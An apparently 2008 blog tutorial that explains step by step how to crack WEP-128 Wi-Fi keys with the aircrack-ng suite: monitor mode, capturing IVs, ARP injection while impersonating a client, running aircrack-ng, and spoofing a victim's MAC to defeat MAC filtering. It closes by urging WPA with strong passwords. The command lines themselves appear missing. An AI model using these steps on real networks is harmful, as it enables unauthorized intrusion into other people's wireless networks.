I am talking about WEP-128 here, which is the most common version and the "more secure" variant of WEP-64. I mean "more secure", because WEP-128 needs some minutes to be cracked and WEP-64 a few seconds. If something is really done that easily, you cannot say it is a "protection" scheme or has to do with encryption and certainly not with privacy. If someone uses WEP, he/she invites people to his open network.
My equipment is perhaps interesting for you who want to verify what I write here. I have the following:
You can also use any other wireless LAN adapter. It would be a great help, if it supports injection, but it will be less efficient to wait for someone using his/her wireless network than do it by yourself. I will explain that below.
One of the most difficult things, perhaps is to put your wireless adapter into monitoring mode. Default mode is called managed. In this mode you connect to one single network. The monitoring mode listens to everything in the air.
aircrack-ng comes with airmon-ng, which is a utility to put the most cards in monitoring mode. It is used like this:
I will use the tools that come with the madwifi-ng driver. Usually my wireless LAN interface is already created as a managed device (here: ath0, device is wifi0), so I have to destroy it first and then recreate it again as a monitoring device. Here is how it is done:
That's it. We listen on everything now. Look check if the device has been really created as ath1 with the command ifconfig -a. Perhaps it got a higher numeric suffix. I will use ath1 here.
Next step is to start airodump-ng to listen on all interesting networks. This is really easy:
You will get a similar output like this, in case you find WEP networks. This is an output from the manpage, by the way, so do not worry about exposed MAC and BSSID adresses.
The access points are at the top of the screen and are sorted by activity. The may disappear from the screen if there are no packets reaching your laptop. The number of beacons should be constantly incrementing. That means that you are near the access point and the quality is good. Walk around with your laptop to improve the PWR score.
You can see two access points here. One is called "the ssid" and the other "NETGEAR". Well, open networks do not need to be cracked, they are already open, unless someone uses IPsec on it. But most open networks are often "protected" by MAC restrictions, which is quite stupid. See below.
Let's try the WEP one. Notice the BSSID address at left side and the channel number 6. You will need it to optimize your crack. You see also two clients with their MAC-adresses (column STATION) using the WEP netword "the ssid". Lucky!
Stop airodump-ng by pressing Ctrl+C and restart it again with the following parameters:
Now we capture the packets to a file called capture-01.cap. You need to capture about 70000 to 80000 IVs to crack the most networks. You don't need to stop airodump-ng while trying out if you captured enough IVs.
We will assume that IVs aren't captured fast enough. And you get bored watching the display. We need two things to optimize the crack.
Given both criteria, you can inject packets that you already captured. The station will recognize them, because they are encrypted and valid. The most important is, it will answer them! You need to be in transmition range for this. If the transmition power (PWR) is too low, you cannot send and receive and even worse, you can get faulty packets that make the crack ineffective.
So let's start the injection to produce IVs! You need another utility from the aircrack-ng package: aireplay-ng.
Start this command in a second terminal. The -b parameter is the BSSID of the wireless network. The -h parameter is the client I want to pretend to be while injecting packages. I selected the client station that is the most talkative here. aireplay-ng will inject ARP packets into the victim wireless network. It takes the packages from our capture file that airodump-ng constantly writes to.
When everything works fine, you will see IVs arriving at a very high rate. That is what we want. We need at least 70000 of them. Have your time, keep it going higher. These are only a few minutes!
Keep injecting and capturing with both utilities and you can try to crack the WEP key, if you think you captured enough. Start this command in a third terminal (keep the other tools running!):
Starting with the -z option needs usually seconds to find the key or it will interrupt the crack attempt and wait for more IVs. If you don't get the key, you can also try without -z. This will take long and perhaps need even more than 70000 packets. I haven't had the case where -z did not work, yet.
The successful crack shows the WEP key in hexadecimal right next to "KEY FOUND!" and the probability of 100%.
There are several problems that you can have connecting to a WEP network. We put the most obvious aside:
There is one more problem. Some people think that restricting their access points to certain MAC addresses will protect them. They are wrong!
Well, remember what we did above. We actually have their MAC addresses and even used them already to inject ARP packets.
If an access point is protected by this mechanism, simply setup your wireless adapter to the victim's MAC address, like this:
This should almost instantly allow you to associate.
As you can see, WEP is really not secure at all. That is why, I recommend to use WPA generally instead of WEP. If your client doesn't have drivers for WPA, get them quick! I showed you above why.
When you switch to WPA-PSK, which most people do, use a strong password. One which cannot be looked up somewhere in a dictionary. The best are random strings or random hexadecimal numbers. Notice that you can also try to crack a WPA-PSK network with aircrack-ng and you just need one special type of packet called "WPA handshake". This usually comes when a client is switched on and associates with the access point.
Scary. But if you choose a strong password, it is almost impossible to try out the password. aircrack-ng can try millions of passwords in a few seconds, so take it seriously! I have a long dictionary here!
There a several tools for that. I recommend to use apg that can produce good passwords. Even pronounceable, if you want to memorize them more easily.
If you are really paranoid and don't trust your own random number generator, you can use dice and diceware. This is not a software. You just throw dice and look up a word in a long list. You get long and good passwords that are really easy to remeber.
m8d.de, 2008